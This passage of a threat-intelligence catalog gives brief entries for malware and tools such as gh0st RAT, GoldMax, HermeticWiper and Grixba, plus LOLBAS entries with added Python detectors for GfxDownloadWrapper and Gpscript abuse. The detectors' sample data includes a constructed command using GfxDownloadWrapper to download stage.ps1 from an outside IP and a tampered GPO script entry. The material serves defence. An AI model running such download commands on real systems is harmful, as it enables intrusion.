c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\ * c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\ * c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\ * 
c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\ * c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\ * c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\ * c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\ * c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\ * c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\ * c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\ * c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\ * c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\ * c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\ * c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\ * c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\ * c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\ * c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\ * c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\ * c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\ * c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ * c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ * c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\

Detection: * Sigma: [proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml) * IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.<sup>[[GfxDownloadWrapper.exe - LOLBAS Project](/references/5d97b7d7-428e-4408-a4d3-00f52cf4bf15)]</sup>
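As an added example, not code from the LOLBAS project or from the MISP galaxy, the following Python applies the detection logic the entry describes to constructed Sysmon-style process-creation records: it flags GfxDownloadWrapper.exe when it runs from outside the DriverStore FileRepository paths listed above, when its first argument is a URL whose host is not gameplayapi.intel.com, or when the destination file is not a .json file. The host allowlist, the path prefix and the sample events are assumptions made for this example.

```python
import re
from urllib.parse import urlparse

# Assumptions, not taken from the LOLBAS entry: the only legitimate download
# host is gameplayapi.intel.com and the binary only runs from the DriverStore
# FileRepository paths listed in the entry.
ALLOWED_HOSTS = {"gameplayapi.intel.com"}
DRIVERSTORE_PREFIX = "c:\\windows\\system32\\driverstore\\filerepository\\"
BINARY = "gfxdownloadwrapper.exe"

_ARG_RE = re.compile(r'"([^"]*)"|(\S+)')


def split_cmdline(cmdline):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted if bare == "" else bare for quoted, bare in _ARG_RE.findall(cmdline)]


def analyze_event(event):
    """Return None for processes other than GfxDownloadWrapper.exe, otherwise a
    summary dict whose 'findings' list is empty for a benign-looking run."""
    image = event["Image"].lower()
    if not image.endswith("\\" + BINARY):
        return None
    args = split_cmdline(event["CommandLine"])[1:]  # drop argv[0]
    url = args[0] if args else ""
    dest = args[1] if len(args) > 1 else ""
    findings = []
    if not image.startswith(DRIVERSTORE_PREFIX):
        findings.append("image outside DriverStore FileRepository")
    if args:
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        if parsed.scheme not in ("http", "https") or not host:
            findings.append("first argument is not an http(s) URL")
        elif host not in ALLOWED_HOSTS:
            findings.append(f"download host {host!r} not in allowlist")
    if dest and not dest.lower().endswith(".json"):
        findings.append(f"destination {dest!r} is not a .json file")
    return {"image": event["Image"], "url": url, "dest": dest, "findings": findings}


def scan(events):
    """Run analyze_event over process-creation events and return the alerts."""
    alerts = []
    for event in events:
        result = analyze_event(event)
        if result and result["findings"]:
            alerts.append(result)
    return alerts


# Constructed Sysmon-style Event ID 1 records; not real telemetry.
_DS = r"C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_01ee1299f4982efe"
SAMPLE_EVENTS = [
    {  # legitimate update check by the Intel Graphics Control Panel
        "Image": _DS + r"\GfxDownloadWrapper.exe",
        "CommandLine": f'"{_DS}\\GfxDownloadWrapper.exe" "https://gameplayapi.intel.com/api/games" "C:\\ProgramData\\Intel\\games.json"',
    },
    {  # signed binary used in place to fetch a script from a non-Intel host
        "Image": _DS + r"\GfxDownloadWrapper.exe",
        "CommandLine": f'"{_DS}\\GfxDownloadWrapper.exe" http://203.0.113.10/stage.ps1 C:\\Users\\Public\\stage.ps1',
    },
    {  # binary copied out of the DriverStore before use
        "Image": r"C:\Users\Public\GfxDownloadWrapper.exe",
        "CommandLine": r"C:\Users\Public\GfxDownloadWrapper.exe https://gameplayapi.intel.com/api/games C:\Users\Public\x.json",
    },
    {  # unrelated process, ignored by the analyzer
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -nop -w hidden",
    },
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["image"], "->", alert["url"], "|", "; ".join(alert["findings"]))
```

The image-path check matters as much as the URL check: the binary is signed, so an attacker who copies it somewhere writable still gets a trusted downloader, and only the process image location gives that away.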

The tag is: misp-galaxy:software="GfxDownloadWrapper"

Moudoor - Associated Software

The tag is: misp-galaxy:software="Moudoor - Associated Software"

Mydoor - Associated Software

The tag is: misp-galaxy:software="Mydoor - Associated Software"

gh0st RAT

[gh0st RAT](https://app.tidalcyber.com/software/269ef8f5-35c8-44ba-afe4-63f4c6431427) is a remote access tool (RAT). The source code is public and it has been used by multiple groups.<sup>[[FireEye Hacking Team](https://app.tidalcyber.com/references/c1e798b8-6771-4ba7-af25-69c640321e40)]</sup><sup>[[Arbor Musical Chairs Feb 2018](https://app.tidalcyber.com/references/bddf44bb-7a0a-498b-9831-7b73cf9a582e)]</sup><sup>[[Nccgroup Gh0st April 2018](https://app.tidalcyber.com/references/4476aa0a-b1ef-4ac6-9e44-5721a0b3e92b)]</sup>

The tag is: misp-galaxy:software="gh0st RAT"

Trojan.GTALK - Associated Software

The tag is: misp-galaxy:software="Trojan.GTALK - Associated Software"

GLOOXMAIL

The tag is: misp-galaxy:software="GLOOXMAIL"

GMER

GMER is a tool used to remove rootkits.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="GMER"

Gold Dragon

[Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263) is a Korean-language, data gathering implant that was first observed in the wild in South Korea in July 2017. [Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263) was used along with [Brave Prince](https://app.tidalcyber.com/software/51b27e2c-c737-4006-a657-195ea1a1f4f0) and [RunningRAT](https://app.tidalcyber.com/software/e8afda1f-fa83-4fc3-b6fb-7d5daca7173f) in operations targeting organizations associated with the 2018 Pyeongchang Winter Olympics. <sup>[[McAfee Gold Dragon](https://app.tidalcyber.com/references/4bdfa92b-cbbd-43e6-aa3e-422561ff8d7a)]</sup>

The tag is: misp-galaxy:software="Gold Dragon"

GoldenSpy

[GoldenSpy](https://app.tidalcyber.com/software/1b135393-c799-4698-a880-c6a86782adee) is a backdoor malware which has been packaged with legitimate tax preparation software. [GoldenSpy](https://app.tidalcyber.com/software/1b135393-c799-4698-a880-c6a86782adee) was discovered targeting organizations in China, being delivered with the "Intelligent Tax" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.<sup>[[Trustwave GoldenSpy June 2020](https://app.tidalcyber.com/references/2a27a2ea-2815-4d97-88c0-47a6e04e84f8)]</sup>

The tag is: misp-galaxy:software="GoldenSpy"

GoldFinder

[GoldFinder](https://app.tidalcyber.com/software/4e8c58c5-443e-4f73-91e9-89146f04e307) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://app.tidalcyber.com/software/4e8c58c5-443e-4f73-91e9-89146f04e307) was discovered in early 2021 during an investigation into the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a) by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447).<sup>[[MSTIC NOBELIUM Mar 2021](https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)]</sup>

The tag is: misp-galaxy:software="GoldFinder"

SUNSHUTTLE - Associated Software

The tag is: misp-galaxy:software="SUNSHUTTLE - Associated Software"

GoldMax

[GoldMax](https://app.tidalcyber.com/software/b05a9763-4288-4656-bf4e-ba02bb8b35d6) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://app.tidalcyber.com/software/b05a9763-4288-4656-bf4e-ba02bb8b35d6) was discovered in early 2021 during the investigation into the [SolarWinds Compromise](https://app.tidalcyber.com/campaigns/8bde8146-0656-5800-82e6-e24e008e4f4a), and has likely been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least mid-2019. [GoldMax](https://app.tidalcyber.com/software/b05a9763-4288-4656-bf4e-ba02bb8b35d6) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.<sup>[[MSTIC NOBELIUM Mar 2021](https://app.tidalcyber.com/references/8688a0a9-d644-4b96-81bb-031f1f898652)]</sup><sup>[[FireEye SUNSHUTTLE Mar 2021](https://app.tidalcyber.com/references/1cdb8a1e-fbed-4db3-b273-5f8f45356dc1)]</sup><sup>[[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]</sup>

The tag is: misp-galaxy:software="GoldMax"

Goopy

[Goopy](https://app.tidalcyber.com/software/a75855fd-2b6b-43d8-99a5-2be03b544f34) is a Windows backdoor and Trojan used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) and shares several similarities to another backdoor used by the group ([Denis](https://app.tidalcyber.com/software/df4002d2-f557-4f95-af7a-9a4582fb7068)). [Goopy](https://app.tidalcyber.com/software/a75855fd-2b6b-43d8-99a5-2be03b544f34) is named for its impersonation of the legitimate Google Updater executable.<sup>[[Cybereason Cobalt Kitty 2017](https://app.tidalcyber.com/references/bf838a23-1620-4668-807a-4354083d69b1)]</sup>

The tag is: misp-galaxy:software="Goopy"

Gpscript.exe - Associated Software

<sup>[[Gpscript.exe - LOLBAS Project](/references/619f57d9-d93b-4e9b-aae0-6ce89d91deb6)]</sup>

The tag is: misp-galaxy:software="Gpscript.exe - Associated Software"

Gpscript

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by group policy to process scripts

Author: Oddvar Moe

Paths: * C:\Windows\System32\gpscript.exe * C:\Windows\SysWOW64\gpscript.exe

Detection: * Sigma: [proc_creation_win_lolbin_gpscript.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml) * IOC: Scripts added in local group policy * IOC: Execution of Gpscript.exe after logon<sup>[[Gpscript.exe - LOLBAS Project](/references/619f57d9-d93b-4e9b-aae0-6ce89d91deb6)]</sup>
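The IOCs above (scripts added in local group policy, gpscript.exe running after logon) can be checked by reading the local Group Policy script registrations that gpscript.exe executes. The following Python is an added example, not LOLBAS or MISP code. It assumes the standard layout under %SystemRoot%\System32\GroupPolicy\{Machine,User}\Scripts and the scripts.ini / psscripts.ini key format (NCmdLine=, NParameters= under [Logon], [Logoff], [Startup], [Shutdown]); the tampered scripts.ini it parses is constructed for the example, and the heuristic that flags drive-letter and UNC paths is the example's own.

```python
import os
import re

# Assumption: default local GPO layout under %SystemRoot%\System32\GroupPolicy.
GPO_SCRIPT_DIRS = (
    os.path.join("System32", "GroupPolicy", "Machine", "Scripts"),
    os.path.join("System32", "GroupPolicy", "User", "Scripts"),
)
INI_NAMES = ("scripts.ini", "psscripts.ini")
_ENTRY_RE = re.compile(r"^(?P<idx>\d+)(?P<key>CmdLine|Parameters)=(?P<val>.*)$")
# Heuristic (this example's own): a drive-letter or UNC path leaves the Scripts tree.
_OUTSIDE_TREE_RE = re.compile(r"^(?:[a-zA-Z]:\\|\\\\)")


def parse_scripts_ini(text):
    """Parse scripts.ini / psscripts.ini into a list of
    {"section", "index", "cmdline", "parameters"} dicts in file order."""
    entries = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        m = _ENTRY_RE.match(line)
        if m is None or section is None:
            continue
        key = (section, int(m.group("idx")))
        entry = entries.setdefault(
            key, {"section": section, "index": key[1], "cmdline": "", "parameters": ""}
        )
        entry["cmdline" if m.group("key") == "CmdLine" else "parameters"] = m.group("val")
    return list(entries.values())


def suspicious_entries(entries):
    """Return entries whose command line points outside the GPO Scripts tree."""
    return [e for e in entries if _OUTSIDE_TREE_RE.match(e["cmdline"])]


def audit_local_gpo(system_root=None):
    """Parse the real scripts.ini files on this host; returns [] when they are
    absent (for example when not running on Windows)."""
    system_root = system_root or os.environ.get("SystemRoot", "C:\\Windows")
    found = []
    for rel in GPO_SCRIPT_DIRS:
        for name in INI_NAMES:
            path = os.path.join(system_root, rel, name)
            if not os.path.isfile(path):
                continue
            with open(path, "rb") as fh:
                data = fh.read()
            # These files are commonly UTF-16 with a BOM; fall back to UTF-8 otherwise.
            if data.startswith((b"\xff\xfe", b"\xfe\xff")):
                text = data.decode("utf-16")
            else:
                text = data.decode("utf-8", "replace")
            for entry in parse_scripts_ini(text):
                entry["file"] = path
                found.append(entry)
    return found


# Constructed sample of a tampered scripts.ini; not a file taken from a real host.
SAMPLE_SCRIPTS_INI = """
[Logon]
0CmdLine=logon.bat
0Parameters=
1CmdLine=C:\\Users\\Public\\update.vbs
1Parameters=/silent
[Logoff]
0CmdLine=\\\\203.0.113.10\\share\\clean.cmd
0Parameters=
"""

if __name__ == "__main__":
    for entry in suspicious_entries(parse_scripts_ini(SAMPLE_SCRIPTS_INI)):
        print(f'[{entry["section"]}] #{entry["index"]}: {entry["cmdline"]} {entry["parameters"]}')
    for entry in audit_local_gpo():
        print(entry["file"], entry["section"], entry["cmdline"])
```

Run on a Windows host, audit_local_gpo() lists every registered local GPO script; compare the output against the last known-good state, since a freshly added entry in either file is exactly the IOC the entry names.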

The tag is: misp-galaxy:software="Gpscript"

Grandoreiro

[Grandoreiro](https://app.tidalcyber.com/software/61d277f2-abdc-4f2b-b50a-10d0fe91e588) is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. [Grandoreiro](https://app.tidalcyber.com/software/61d277f2-abdc-4f2b-b50a-10d0fe91e588) has confirmed victims in Brazil, Mexico, Portugal, and Spain.<sup>[[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]</sup><sup>[[ESET Grandoreiro April 2020](https://app.tidalcyber.com/references/d6270492-986b-4fb6-bdbc-2e364947847c)]</sup>

The tag is: misp-galaxy:software="Grandoreiro"

GraphicalProton

According to joint Cybersecurity Advisory AA23-347A (December 2023), GraphicalProton "is a simplistic backdoor that uses OneDrive, Dropbox, and randomly generated BMPs" to exchange data with its operators. During a 2023 campaign, authorities also observed an HTTPS variant of GraphicalProton that relies on HTTP requests instead of cloud-based services.<sup>[[U.S. CISA SVR TeamCity Exploits December 2023](/references/5f66f864-58c2-4b41-8011-61f954e04b7e)]</sup>

The tag is: misp-galaxy:software="GraphicalProton"

GravityRAT

[GravityRAT](https://app.tidalcyber.com/software/08cb425d-7b7a-41dc-a897-9057ce57fea9) is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are "TheMartian" and "The Invincible." According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organizations and entities in India. <sup>[[Talos GravityRAT](https://app.tidalcyber.com/references/2d7a1d72-cc9a-4b0b-a89a-e24ca836879b)]</sup>

The tag is: misp-galaxy:software="GravityRAT"

Green Lambert

[Green Lambert](https://app.tidalcyber.com/software/f5691425-6690-4e5e-8304-3ede9d2f5a90) is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of [Green Lambert](https://app.tidalcyber.com/software/f5691425-6690-4e5e-8304-3ede9d2f5a90) may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.<sup>[[Kaspersky Lamberts Toolkit April 2017](https://app.tidalcyber.com/references/2be23bfb-c6fb-455e-ae88-2ae910ccef60)]</sup><sup>[[Objective See Green Lambert for OSX Oct 2021](https://app.tidalcyber.com/references/fad94973-eafa-4fdb-b7aa-22c21d894f81)]</sup>

The tag is: misp-galaxy:software="Green Lambert"

GreyEnergy

[GreyEnergy](https://app.tidalcyber.com/software/f646e7f9-4d09-46f6-9831-54668fa20483) is a backdoor written in C and compiled in Visual Studio. [GreyEnergy](https://app.tidalcyber.com/software/f646e7f9-4d09-46f6-9831-54668fa20483) shares similarities with the [BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) malware and is thought to be its successor.<sup>[[ESET GreyEnergy Oct 2018](https://app.tidalcyber.com/references/f3e70f41-6c22-465c-b872-a7ec5e6a3e67)]</sup>

The tag is: misp-galaxy:software="GreyEnergy"

GrimAgent

The tag is: misp-galaxy:software="GrimAgent"

Grixba

Grixba is a tool used by Play Ransomware operators to scan victim networks for information discovery purposes. Grixba compiles and saves collected information into CSV files, which are then compressed with WinRAR and exfiltrated to threat actors.<sup>[[Symantec Play Ransomware April 19 2023](/references/a78613a5-ce17-4d11-8f2f-3e642cd7673c)]</sup>

The tag is: misp-galaxy:software="Grixba"

gsecdump

[gsecdump](https://app.tidalcyber.com/software/5ffe662f-9da1-4b6f-ad3a-f296383e828c) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. <sup>[[TrueSec Gsecdump](https://app.tidalcyber.com/references/ba1d07ed-2e18-4f5f-9d44-082530946f14)]</sup>

The tag is: misp-galaxy:software="gsecdump"

GuLoader

[GuLoader](https://app.tidalcyber.com/software/03e985d6-870b-4533-af13-08b1e0511444) is a file downloader that has been used since at least December 2019 to distribute a variety of remote administration tool (RAT) malware, including [NETWIRE](https://app.tidalcyber.com/software/c7d0e881-80a1-49ea-9c1f-b6e53cf399a8), [Agent Tesla](https://app.tidalcyber.com/software/304650b1-a0b5-460c-9210-23a5b53815a4), [NanoCore](https://app.tidalcyber.com/software/db05dbaa-eb3a-4303-b37e-18d67e7e85a1), FormBook, and Parallax RAT.<sup>[[Unit 42 NETWIRE April 2020](https://app.tidalcyber.com/references/b42f119d-144a-470a-b9fe-ccbf80a78fbb)]</sup><sup>[[Medium Eli Salem GuLoader April 2021](https://app.tidalcyber.com/references/87c5e84a-b96d-489d-aa10-db95b78c5a93)]</sup>

The tag is: misp-galaxy:software="GuLoader"

H1N1

[H1N1](https://app.tidalcyber.com/software/5f1602fe-a4ce-4932-9cf9-ec842f2c58f1) is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. <sup>[[Cisco H1N1 Part 1](https://app.tidalcyber.com/references/03a2faca-1a47-4f68-9f26-3fa98145f2ab)]</sup>

The tag is: misp-galaxy:software="H1N1"

Hacking Team UEFI Rootkit

[Hacking Team UEFI Rootkit](https://app.tidalcyber.com/software/75db2ac3-901e-4b1f-9a0d-bac6562d57a3) is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. <sup>[[TrendMicro Hacking Team UEFI](https://app.tidalcyber.com/references/24796535-d516-45e9-bcc7-8f03a3f3cd73)]</sup>

The tag is: misp-galaxy:software="Hacking Team UEFI Rootkit"

HALFBAKED

[HALFBAKED](https://app.tidalcyber.com/software/5edf0ef7-a960-4500-8a89-8c8b4fdf8824) is a malware family consisting of multiple components intended to establish persistence in victim networks. <sup>[[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)]</sup>

The tag is: misp-galaxy:software="HALFBAKED"

HammerDuke - Associated Software

The tag is: misp-galaxy:software="HammerDuke - Associated Software"

NetDuke - Associated Software

The tag is: misp-galaxy:software="NetDuke - Associated Software"

Chanitor - Associated Software

The tag is: misp-galaxy:software="Chanitor - Associated Software"

Hancitor

The tag is: misp-galaxy:software="Hancitor"

HAPPYWORK

[HAPPYWORK](https://app.tidalcyber.com/software/c2c31b2e-5da6-4feb-80e3-14ea6d0ea7e8) is a downloader used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) to target South Korean government and financial victims in November 2016. <sup>[[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]</sup>

The tag is: misp-galaxy:software="HAPPYWORK"

HARDRAIN

[HARDRAIN](https://app.tidalcyber.com/software/ad0ae3b7-88aa-48b3-86ca-6a5d8b5309a7) is a Trojan malware variant reportedly used by the North Korean government. <sup>[[US-CERT HARDRAIN March 2018](https://app.tidalcyber.com/references/ffc17fa5-e7d3-4592-b47b-e12ced0e62a4)]</sup>

The tag is: misp-galaxy:software="HARDRAIN"

Havij

[Havij](https://app.tidalcyber.com/software/8bd36306-bd4b-4a76-8842-44acb0cedbcc) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. <sup>[[Check Point Havij Analysis](https://app.tidalcyber.com/references/2e00a539-acbe-4462-a30f-43da4e8b9c4f)]</sup>

The tag is: misp-galaxy:software="Havij"

HAWKBALL

[HAWKBALL](https://app.tidalcyber.com/software/392c5a32-53b5-4ce8-a946-226cb533cc4e) is a backdoor that was observed in targeting of the government sector in Central Asia.<sup>[[FireEye HAWKBALL Jun 2019](https://app.tidalcyber.com/references/c88150b1-8c0a-4fc5-b5b7-11e242af1c43)]</sup>

The tag is: misp-galaxy:software="HAWKBALL"

hcdLoader

The tag is: misp-galaxy:software="hcdLoader"

Custom HDoor - Associated Software

The tag is: misp-galaxy:software="Custom HDoor - Associated Software"

HDoor

The tag is: misp-galaxy:software="HDoor"

HELLOKITTY

[HELLOKITTY](https://app.tidalcyber.com/software/813a4ca1-84fe-42dc-89de-5873d028f98d) is a ransomware written in C++ that shares similar code structure and functionality with [DEATHRANSOM](https://app.tidalcyber.com/software/832f5ab1-1267-40c9-84ef-f32d6373be4e) and [FIVEHANDS](https://app.tidalcyber.com/software/84187393-2fe9-4136-8720-a6893734ee8c). [HELLOKITTY](https://app.tidalcyber.com/software/813a4ca1-84fe-42dc-89de-5873d028f98d) has been used since at least 2020; targets have included a Polish video game developer and a Brazilian electric power company.<sup>[[FireEye FiveHands April 2021](https://app.tidalcyber.com/references/832aeb46-b248-43e8-9157-a2f56bcd1806)]</sup>

The tag is: misp-galaxy:software="HELLOKITTY"

Helminth

[Helminth](https://app.tidalcyber.com/software/d6560c81-1e7e-4d01-9814-4be4fb43e655) is a backdoor that has at least two variants: one written in VBScript and PowerShell that is delivered via macros in Excel spreadsheets, and one that is a standalone Windows executable. <sup>[[Palo Alto OilRig May 2016](https://app.tidalcyber.com/references/53836b95-a30a-4e95-8e19-e2bb2f18c738)]</sup>

The tag is: misp-galaxy:software="Helminth"

DriveSlayer - Associated Software

<sup>[[Crowdstrike PartyTicket March 2022](https://app.tidalcyber.com/references/8659fea7-7d65-4ee9-8ceb-cf41204b57e0)]</sup><sup>[[Crowdstrike DriveSlayer February 2022](https://app.tidalcyber.com/references/4f01e901-58f8-4fdb-ac8c-ef4b6bfd068e)]</sup>

The tag is: misp-galaxy:software="DriveSlayer - Associated Software"

Trojan.Killdisk - Associated Software

<sup>[[CISA AA22-057A Destructive Malware February 2022](https://app.tidalcyber.com/references/18684085-c156-4610-8b1f-cc9646f2c06e)]</sup><sup>[[Symantec Ukraine Wipers February 2022](https://app.tidalcyber.com/references/3ed4cd00-3387-4b80-bda8-0a190dc6353c)]</sup>

The tag is: misp-galaxy:software="Trojan.Killdisk - Associated Software"

HermeticWiper

[HermeticWiper](https://app.tidalcyber.com/software/f0456f14-4913-4861-b4ad-5e7f3960040e) is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.<sup>[[SentinelOne Hermetic Wiper February 2022](https://app.tidalcyber.com/references/96825555-1936-4ee3-bb25-423dc16a9116)]</sup><sup>[[Symantec Ukraine Wipers February 2022](https://app.tidalcyber.com/references/3ed4cd00-3387-4b80-bda8-0a190dc6353c)]</sup><sup>[[Crowdstrike DriveSlayer February 2022](https://app.tidalcyber.com/references/4f01e901-58f8-4fdb-ac8c-ef4b6bfd068e)]</sup><sup>[[ESET Hermetic Wiper February 2022](https://app.tidalcyber.com/references/07ef66e8-195b-4afe-a518-ce9e77220038)]</sup><sup>[[Qualys Hermetic Wiper March 2022](https://app.tidalcyber.com/references/2b25969b-2f0b-4204-9277-596e80c4e626)]</sup>

The tag is: misp-galaxy:software="HermeticWiper"

HermeticWizard

[HermeticWizard](https://app.tidalcyber.com/software/36ddc8cd-8f80-489e-a702-c682936b5393) is a worm that has been used to spread [HermeticWiper](https://app.tidalcyber.com/software/f0456f14-4913-4861-b4ad-5e7f3960040e) in attacks against organizations in Ukraine since at least 2022.<sup>[[ESET Hermetic Wizard March 2022](https://app.tidalcyber.com/references/e0337ce9-2ca9-4877-b116-8c4d9d864df0)]</sup>

The tag is: misp-galaxy:software="HermeticWizard"

Heyoka Backdoor

[Heyoka Backdoor](https://app.tidalcyber.com/software/1841a6e8-6c23-46a1-9c81-783746083764) is a custom backdoor, based on the Heyoka open source exfiltration tool, that has been used by [Aoqin Dragon](https://app.tidalcyber.com/groups/454402a3-0503-45bf-b2e0-177fa2e2d412) since at least 2013.<sup>[[SentinelOne Aoqin Dragon June 2022](https://app.tidalcyber.com/references/b4e792e0-b1fa-4639-98b1-233aaec53594)]</sup><sup>[[Sourceforge Heyoka 2022](https://app.tidalcyber.com/references/f6677391-cb7a-4abc-abb7-3a8cd47fbc90)]</sup>

The tag is: misp-galaxy:software="Heyoka Backdoor"

Hh.exe - Associated Software

<sup>[[Hh.exe - LOLBAS Project](/references/4e09bfcf-f5be-46c5-9ebf-8742ac8d1edc)]</sup>

The tag is: misp-galaxy:software="Hh.exe - Associated Software"

Hh

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary used for processing chm files in Windows

Author: Oddvar Moe

Paths: * C:\Windows\hh.exe * C:\Windows\SysWOW64\hh.exe

The tag is: misp-galaxy:software="Hh"

HiddenWasp

[HiddenWasp](https://app.tidalcyber.com/software/ec02fb9c-bf9f-404d-bc54-819f2b3fb040) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.<sup>[[Intezer HiddenWasp Map 2019](https://app.tidalcyber.com/references/dfef8451-031b-42a6-8b78-d25950cc9d23)]</sup>

The tag is: misp-galaxy:software="HiddenWasp"

HIDEDRV

The tag is: misp-galaxy:software="HIDEDRV"

Hikit

[Hikit](https://app.tidalcyber.com/software/8046c80c-4339-4cfb-8bfd-464801db2bfe) is malware that has been used by [Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca) for late-stage persistence and exfiltration after the initial compromise.<sup>[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]</sup><sup>[[FireEye Hikit Rootkit](https://app.tidalcyber.com/references/65d751cb-fdd2-4a45-81db-8a5a11bbee62)]</sup>

The tag is: misp-galaxy:software="Hikit"

Hildegard

[Hildegard](https://app.tidalcyber.com/software/7ef8cd3a-33cf-43bb-a3b8-a78fc844ce0c) is malware that targets misconfigured kubelets for initial access and runs cryptocurrency miner operations. The malware was first observed in January 2021. The TeamTNT activity group is believed to be behind [Hildegard](https://app.tidalcyber.com/software/7ef8cd3a-33cf-43bb-a3b8-a78fc844ce0c). <sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup>

The tag is: misp-galaxy:software="Hildegard"
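The initial access described above is a kubelet that answers unauthenticated requests. The following check is an added example, not Unit 42's or TeamTNT's code: it reads a KubeletConfiguration (the JSON form, which the kubelet accepts for --config) and flags the settings that produce that exposure. Both configurations are constructed for the example.

```python
"""Audit a KubeletConfiguration for the exposure that gives Hildegard-style
attacks their initial access (added example; not Unit 42's or TeamTNT's code).
Configs are parsed as JSON, which the kubelet also accepts for --config."""
import json

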